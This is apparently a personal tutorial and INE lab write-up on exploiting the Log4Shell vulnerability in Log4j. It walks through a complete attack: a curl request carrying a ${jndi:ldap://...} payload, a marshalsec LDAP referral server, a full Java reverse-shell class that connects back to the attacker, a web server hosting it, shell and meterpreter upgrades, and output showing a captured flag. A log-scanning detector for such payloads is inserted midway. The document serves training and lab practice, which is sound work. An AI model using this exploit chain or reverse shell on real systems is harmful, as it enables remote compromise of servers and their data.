Log4j Vulnerability (Log4Shell)

Vulnerability reported on 9 Dec 2021 in the Apache Java logging library Log4j.

Background:

1- A quick 3-minute video from Marcus Hutchins on what all the fuss is about:

  • GOVCERT:

  • A more practical demonstration from Sophos:

Tutorial notes:

Check if the server is vulnerable:

1- Start a listener:

nc -nlvp 1234

2- Send a request to the potentially vulnerable parameter:

curl '<url>?cmd=${jndi:ldap://<attacker_IP>:1234}'

If you receive a connection in nc, the target is vulnerable.
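The same probe seen from the defender's side: an added example (not part of the original notes) that scans web-server access-log lines for the literal ${jndi:...} lookup string used above and extracts the callback host and port so they can be blocked and correlated. The log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not taken from the original notes). Lines 1-2
# carry the probe shape sent with curl above, once percent-encoded and once raw;
# line 3 is ordinary traffic and must not be flagged.
SAMPLE_LOG = """\
192.10.137.2 - - [08/Jan/2022:15:40:01 +0000] "GET /login?cmd=$%7Bjndi:ldap://192.10.137.2:1234%7D HTTP/1.1" 200 512
192.10.137.2 - - [08/Jan/2022:15:41:09 +0000] "GET /login?cmd=${jndi:ldap://192.10.137.2:1389/Exploit} HTTP/1.1" 200 512
10.0.0.5 - - [08/Jan/2022:15:42:00 +0000] "GET /login?cmd=status HTTP/1.1" 200 512
"""

# Common-log-format prefix: source IP, then the quoted "METHOD TARGET PROTO".
ACCESS_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')
# The literal lookup form used on this page: ${jndi:<scheme>:<rest>}
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+):(?P<rest>[^}\s]*)\}", re.IGNORECASE)


def find_jndi_lookups(log_text):
    """Return one finding per ${jndi:...} lookup found in the request target.

    Each finding records the source IP, the lookup scheme and the callback
    host, port and path, which is what a responder needs to block and pivot on.
    """
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = ACCESS_RE.match(line)
        if not m:
            continue
        # Decode once: clients may percent-encode the braces.
        decoded = unquote(m.group("target"))
        for hit in JNDI_RE.finditer(decoded):
            rest = hit.group("rest").lstrip("/")          # "host:port/path"
            hostport, _, path = rest.partition("/")
            host, _, port = hostport.partition(":")
            findings.append({
                "line": lineno,
                "src": m.group("src"),
                "scheme": hit.group("scheme").lower(),
                "callback_host": host,
                "callback_port": int(port) if port.isdigit() else None,
                "callback_path": path,
            })
    return findings


if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

Only the request target is scanned here; headers such as User-Agent are logged separately and would need the same regex applied to them.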

Exploiting the vulnerability with your own LDAP server:

1- Set up an LDAP server so we can interpret the response:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<attacker_IP>:8080/#Exploit"

#Exploit: the name of the exploit class we will create.

  • Inside poc.py there is the Java code (in a comment). Copy it to a new Exploit.java file, since that is the exploit, and fill in your String host="<attackerIP>"; int port = <nc_port>;

2- Compile the exploit:

javac Exploit.java -source 8 -target 8

-source: Java language version of the source file

-target: JDK version the compiled class targets

You get 1 warning; don't worry about it.

3- Set up the web server that hosts the Exploit class:

python -m SimpleHTTPServer 8080

8080 because that's the port in the URL we gave the LDAP server in step 1.

4- Set up a listener to receive the connection from the target once it's exploited:

nc -nlvp 9999

Same port as the one in Exploit.java.

5- Attack (send the request):

curl '<target_url>?cmd=${jndi:ldap://<attacker_ip>:<ldap_port>/Exploit}'

<ldap_port>: the port the LDAP server from step 1 is listening on.

No need to append the .class extension; the lookup resolves the class name by itself.

🎉 Now nc receives a connection and you have a reverse shell. 🎉

You can spawn a proper bash shell:

python -c 'import pty;pty.spawn("/bin/bash")'

And of course you can upgrade to a meterpreter shell:

use multi/handler
set LHOST <attacker_ip>
set LPORT <port in java code>
run
background
sessions -u 1 <- this uses the shell_to_meterpreter module

Solving the INE box:

target: demo.ine.local

My IP: 192.10.137.2

Footprinting:

~# nmap -sV demo.ine.local

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-08 15:37 IST
Nmap scan report for demo.ine.local (192.10.137.3)
Host is up (0.0000090s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache Tomcat 8.5.3
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)

Runs Apache Tomcat; by default Tomcat doesn't depend on Log4j, but it can be configured to use it.

Apache JServ is interesting but not the target here; I know this version is vulnerable.

Checking for the vulnerability:

nc -nlvp 1234
curl 'http://demo.ine.local/login?cmd=${jndi:ldap://192.10.137.2:1234}'

We got a response in nc, so it's vulnerable... 😀

Time to exploit it:

  • My LDAP server:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.10.137.2:8080/#Exploit"

Listening on 0.0.0.0:1389
  • nc listener:

nc -nlvp 9999
  • Compiling the Java exploit (reverse shell):

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {
  public Exploit() throws Exception {

    String host="192.10.137.2";
    int port=9999;
    String cmd="/bin/sh";
    
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    
    Socket s=new Socket(host,port);
    
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();

    while(!s.isClosed()) {

      while(pi.available()>0)
        so.write(pi.read());

      while(pe.available()>0)
        so.write(pe.read());

      while(si.available()>0)
        po.write(si.read());

      so.flush();
      po.flush();
      Thread.sleep(50);

      try {
        p.exitValue();
        break;
      }
      catch (Exception e){}
    };
    p.destroy();
    s.close();
  }
}
javac Exploit.java -source 8 -target 8
  • Web server hosting the exploit:

python -m SimpleHTTPServer 8080
  • Exploit:

curl 'http://demo.ine.local/login?cmd=${jndi:ldap://192.10.137.2:1389/Exploit}'
  • Goal achieved:

root@INE:~# nc -nlvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.10.137.3.
Ncat: Connection from 192.10.137.3:46500.
ls
FLAG
tomcat8
cat FLAG
33fbfa01ec2f791096f13e01988a164e
